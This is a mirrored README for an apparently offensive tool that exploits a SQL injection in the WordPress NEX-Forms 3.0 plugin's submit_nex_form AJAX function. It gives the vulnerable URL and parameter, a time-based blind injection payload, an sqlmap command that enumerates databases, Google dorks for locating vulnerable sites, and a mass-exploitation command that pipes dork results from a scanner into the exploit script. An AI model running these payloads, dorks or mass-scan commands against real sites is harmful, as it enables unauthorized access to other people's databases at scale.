Code Monkey home page Code Monkey logo

wordpress-nex-forms-3.0-sql-injection-vulnerability's Introduction

WordPress-NEX-Forms-3.0-SQL-Injection-Vulnerability

MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL Injection Vulnerability

  # AUTOR SCRIPT:  Cleiton Pinheiro / Nick: googleINURL
  # Email:         [email protected]
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil
  # Who Discovered http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
  # Vulnerability discovered by: Claudio Viviani
  • VENTOR

https://wordpress.org/plugins/nex-forms-express-wp-form-builder/

  • Vulnerability Description

The "submit_nex_form" ajax function is affected from SQL Injection vulnerability

  • Tool Description

Automation script explores targets with the help of SqlMap tool Execute command SqlMap

{$params['folder']} -u '{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1' 
  --technique=B -p nex_forms_Id --dbms mysql {$params['proxy']} --random-agent 
  --answers='follow=N' --dbs --batch --time-sec 10 --level 2  --risk 1
  • GET VULN

SQL can be injected in the following GET

GET VULN:     nex_forms_Id=(id)
$nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
Ex: http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1
  • XPL inject DBMS: 'MySQL'
Exploit:  AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
  • GOOGLE DORK
inurl:nex-forms-express-wp-form-builder
index of nex-forms-express-wp-form-builde
  • COMMAND --help:
    -t : SET TARGET.
    -f : SET FILE TARGETS.
    -p : SET PROXY
    Execute:
                  php wp3xplo1t.php -t target
                  php wp3xplo1t.php -f targets.txt
                  php wp3xplo1t.php -t target -p 'http://localhost:9090'
  • EXPLOIT MASS USE SCANNER INURLBR
./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"
  • DOWNLOAD INURLBR

https://github.com/googleinurl/SCANNER-INURLBR

  • REFERENCE

[1] http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli

wordpress-nex-forms-3.0-sql-injection-vulnerability's People

Contributors

googleinurl avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.